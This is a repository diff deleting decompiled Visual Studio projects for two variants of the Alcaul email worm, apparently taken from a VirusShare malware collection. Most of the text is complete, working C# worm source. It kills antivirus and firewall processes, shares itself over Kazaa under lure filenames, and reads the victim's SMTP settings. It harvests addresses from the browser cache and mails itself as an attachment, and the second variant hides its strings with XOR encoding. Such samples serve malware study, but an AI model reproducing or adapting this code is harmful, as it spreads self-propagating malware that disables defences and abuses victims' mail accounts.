<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="alcopaul\brigadaochodotnet.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "2peace", "Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.csproj", "{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -1,17 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000003\u002D1 \u0024\u0024method0x6000003\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000003\u002D1
{
}
}

View File

@ -1,212 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: alcopaul.brigadaochodotnet
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace alcopaul
{
public class brigadaochodotnet
{
public static void Main(string[] args)
{
string str1 = "zonealarm,wfindv32,vb6,webscanx,vsstat,vshwin32,vsecomr,vscan40,vettray,vet95,tds2-nt,tds2-98,tca,tbscan,sweep95,sphinx,smc,serv95,scrscan,scanpm,scan95,scan32,safeweb,rescue,rav7win,rav7,persfw,pcfwallicon,pccwin98,pavw,pavsched,pavcl,padmin,outpost,nvc95,nupgrade,normist,nmain,nisum,navwnt,navw32,navnt,navlu32,navapw32,n32scanw,mpftray,moolive,luall,lookout,lockdown2000,jedi,iomon98,iface,icsuppnt,icsupp95,icmon,icloadnt,icload95,ibmavsp,ibmasn,iamserv,iamapp,frw,fprot,fp-win,findviru,f-stopw,f-prot95,f-prot,f-agnt95,espwatch,esafe,ecengine";
string str2 = "dvp95_0,dvp95,cleaner3,cleaner,claw95cf,claw95,cfinet32,cfinet,cfiaudit,cfiadmin,blackice,blackd,avwupd32,avwin95,avsched32,avpupd,avptc32,avpm,avpdos32,avpcc,avp32,avp,avnt,avkserv,avgctrl,ave32,avconsol,autodown,apvxdwin,anti-trojan,ackwin32,_avpm,_avpcc,_avp32";
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string ave in strArray1)
brigadaochodotnet.killprocs(ave);
foreach (string ave in strArray2)
brigadaochodotnet.killprocs(ave);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string tach = brigadaochodotnet.uue(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey("Software\\Kazaa\\LocalContent", true).SetValue("Dir0", (object) ("012345:" + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[11]
{
"shakira.exe",
"avril_lavigne.exe",
"Visual_Studio.NET2003_key.exe",
"teach_yourself_c#_in_1_week.exe",
"scan.net.exe",
"hitman2fulldownloader.exe",
"Tekken4_full_downloader.exe",
"teach_yourself_COBOL.NET_in_21_days.exe",
"how_to_get_chicks_on_your_bed.exe",
"brigadaocho.net.exe",
"drunken_pope_pics.exe"
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager", true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + registryKey1.GetValue("Default Mail Account").ToString(), true);
string mserv = registryKey2.GetValue("SMTP Server").ToString();
string fm = registryKey2.GetValue("SMTP Email Address").ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, "*.ht*"))
brigadaochodotnet.extractmails(file, mserv, fm, tach);
}
}
int num = (int) MessageBox.Show("brigada ocho ::: \"bringing the c# technology to the masses\"", "msil.mass by PerrunBoy ::: http://vx.netlux.org/~b8", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
public static void extractmails(string phile, string mserv, string fm, string tach)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(phile, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string to = brigadaochodotnet.xtrak(streamReader.ReadLine());
if (to != "")
brigadaochodotnet.castaway(mserv, fm, to, tach);
}
streamReader.Close();
}
public static string xtrak(string datum)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = datum;
try
{
int sourceIndex = str1.IndexOf("mailto:");
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace("mailto:", "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string uue(string attch)
{
FileStream input = new FileStream(attch, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void killprocs(string ave)
{
foreach (Process process in Process.GetProcessesByName(ave))
process.Kill();
}
public static void castaway(string serv, string from, string to, string attch)
{
string str1 = "From: " + from + " <" + from + ">\r\n";
string str2 = "To: " + to + " <" + to + ">\r\n";
string str3 = "Date: " + DateTime.Now.ToString() + "\r\n";
string str4 = "X-Mailer: dotNETSMTPengine\r\n";
string str5 = "X-Priority: 3\r\n";
string str6 = "MIME-Version: 1.0\r\n";
string str7 = "Content-Type: multipart/mixed; boundary=\"----=rerty\";\r\n\r\n";
string str8 = "This is a multi-part message in MIME format.\r\n\r\n";
string str9 = "------=rerty\r\n";
string str10 = "Content-Type: text/html; charset=us-ascii\r\n\r\n";
string str11 = "\"all we are saying, is give peace a chance. no to war and terrorism.\"\r\n\r\n";
string str12 = "------=rerty\r\n";
string str13 = "Content-Type: application/x-msdownload; name=\"topeace.exe\"\r\n";
string str14 = "Content-Transfer-Encoding: base64\r\n";
string str15 = "Content-Disposition: attachment; ";
string str16 = "filename=\"topeace.exe\"\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "------=rerty--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(serv, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes("HELO localhost\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes("MAIL FROM: <" + from + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes("RCPT TO: <" + to + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes("DATA\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + attch + str17 + str18);
stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes("QUIT\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}

View File

@ -1,3 +0,0 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]

View File

@ -1,41 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>b</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="drunkenpope\brigada8.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "b", "Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.csproj", "{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Debug|Any CPU.Build.0 = Debug|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Release|Any CPU.ActiveCfg = Release|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -1,17 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000003\u002D1 \u0024\u0024method0x6000003\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000003\u002D1
{
}
}

View File

@ -1,230 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: drunkenpope.brigada8
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace drunkenpope
{
public class brigada8
{
public static void Main(string[] args)
{
try
{
string str1 = brigada8.modem("xmlgcncpo.udklft10.t`4.ug`qaclz.tqqvcv.tqjukl10.tqgamop.tqacl62.tgvvpc{.tgv;7.vfq0/lv.vfq0/;:.vac.v`qacl.quggr;7.qrjklz.qoa.qgpt;7.qapqacl.qaclro.qacl;7.qacl10.qcdgug`.pgqawg.pct5ukl.pct5.rgpqdu.raducnnkaml.raaukl;:.rctu.rctqajgf.rctan.rcfokl.mwvrmqv.lta;7.lwrepcfg.lmpokqv.lockl.lkqwo.lctulv.lctu10.lctlv.lctnw10.lctcru10.l10qaclu.ordvpc{.ommnktg.nwcnn.nmmimwv.nmaifmul0222.hgfk.kmoml;:.kdcag.kaqwrrlv.kaqwrr;7.kaoml.kanmcflv.kanmcf;7.k`octqr.k`ocql.kcoqgpt.kcocrr.dpu.drpmv.dr/ukl.dklftkpw.d/qvmru.d/rpmv;7.d/rpmv.d/celv;7.gqrucvaj.gqcdg.gagleklg");
string str2 = brigada8.modem("ftr;7]2.ftr;7.angclgp1.angclgp.ancu;7ad.ancu;7.adklgv10.adklgv.adkcwfkv.adkcfokl.`ncaikag.`ncaif.ctuwrf10.ctukl;7.ctqajgf10.ctrwrf.ctrva10.ctro.ctrfmq10.ctraa.ctr10.ctr.ctlv.ctiqgpt.cteavpn.ctg10.ctamlqmn.cwvmfmul.crtzfukl.clvk/vpmhcl.caiukl10.]ctro.]ctraa.]ctr10");
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string vry324 in strArray1)
brigada8.kernelhalt(vry324);
foreach (string vry324 in strArray2)
brigada8.kernelhalt(vry324);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string akt7 = brigada8.xmlparse234(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Icxcc^NmacnAmlvglv"), true).SetValue(brigada8.modem("Fkp2"), (object) (brigada8.modem("2301678") + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[4]
{
brigada8.modem("Tkqwcn]Qvwfkm,LGV0221]ig{,gzg"),
brigada8.modem("vgcaj]{mwpqgnd]a!]kl]3]uggi,gzg"),
brigada8.modem("jkvocl0,gzg"),
brigada8.modem("Vgiigl6]dwnn,gzg")
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp"), true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp^Caamwlvq^") + registryKey1.GetValue(brigada8.modem("Fgdcwnv\"Ockn\"Caamwlv")).ToString(), true);
string m91 = registryKey2.GetValue(brigada8.modem("QOVR\"Qgptgp")).ToString();
string foam = registryKey2.GetValue(brigada8.modem("QOVR\"Gockn\"Cffpgqq")).ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, brigada8.modem("(,jv(")))
brigada8.melee(file, m91, foam, akt7);
}
}
int num = (int) MessageBox.Show(brigada8.modem("lm\"ompg\"`gvc\"vumq"), brigada8.modem("oqkn,ocqq,`\"*a!n{\"ocfg+\"`{\"cnamrcwn-`pkecfc\"majm"), MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
catch
{
}
}
public static void melee(string f91, string m91, string foam, string akt7)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(f91, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string hjkl = brigada8.harvest(streamReader.ReadLine());
if (hjkl != "")
{
try
{
brigada8.codedom563(m91, foam, hjkl, akt7);
}
catch
{
}
}
}
streamReader.Close();
}
public static string harvest(string helga)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = helga;
try
{
int sourceIndex = str1.IndexOf(brigada8.modem("ocknvm8"));
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace(brigada8.modem("ocknvm8"), "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string xmlparse234(string tukoo)
{
FileStream input = new FileStream(tukoo, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void kernelhalt(string vry324)
{
foreach (Process process in Process.GetProcessesByName(vry324))
process.Kill();
}
public static string modem(string hhh)
{
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hhh.Length; ++index)
{
int num = Convert.ToInt32(hhh[index]) ^ 2;
stringBuilder.Append(Convert.ToChar(num));
}
return stringBuilder.ToString();
}
public static void codedom563(string asdf, string cvbn, string hjkl, string tukoo)
{
string str1 = brigada8.modem("Dpmo8\"") + cvbn + " <" + cvbn + ">\r\n";
string str2 = brigada8.modem("Vm8\"") + hjkl + " <" + hjkl + ">\r\n";
string str3 = brigada8.modem("Fcvg8\"") + DateTime.Now.ToString() + "\r\n";
string str4 = brigada8.modem("Z/Ockngp8\"fmlmvvmwaj") + "\r\n";
string str5 = brigada8.modem("Z/Rpkmpkv{8\"1") + "\r\n";
string str6 = brigada8.modem("OKOG/Tgpqkml8\"3,2") + "\r\n";
string str7 = brigada8.modem("Amlvglv/V{rg8\"ownvkrcpv-okzgf9\"`mwlfcp{? //`q`h 9") + "\r\n\r\n";
string str8 = brigada8.modem("Vjkq\"kq\"c\"ownvk/rcpv\"ogqqceg\"kl\"OKOG\"dmpocv,") + "\r\n\r\n";
string str9 = "----bsbj\r\n";
string str10 = brigada8.modem("Amlvglv/V{rg8\"vgzv-jvon9\"ajcpqgv?wq/cqakk") + "\r\n\r\n";
string str11 = brigada8.modem(" Rggp/vm/Rggp\",LGV\"Qmdvucpg\"cvvcajgf,\"Pgswkpgq\"vjg\",LGV\"dpcogumpi, ") + "\r\n\r\n";
string str12 = "----bsbj\r\n";
string str13 = brigada8.modem("Amlvglv/V{rg8\"crrnkacvkml-z/oqfmulnmcf9\"lcog? lgvdz3,gzg ") + "\r\n";
string str14 = brigada8.modem("Amlvglv/Vpclqdgp/Glamfkle8\"`cqg46") + "\r\n";
string str15 = brigada8.modem("Amlvglv/Fkqrmqkvkml8\"cvvcajoglv9\"");
string str16 = brigada8.modem("dknglcog? lgvdz3,gzg ") + "\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "----bsbj--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(asdf, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes(brigada8.modem("JGNM\"nmacnjmqv") + "\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes(brigada8.modem("OCKN\"DPMO8\"") + "<" + cvbn + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes(brigada8.modem("PARV\"VM8\"") + "<" + hjkl + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes(brigada8.modem("FCVC") + "\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + tukoo + str17 + str18);
stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes(brigada8.modem("SWKV") + "\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}

View File

@ -1,13 +0,0 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyVersion("1.0.1289.25246")]

Some files were not shown because too many files have changed in this diff Show More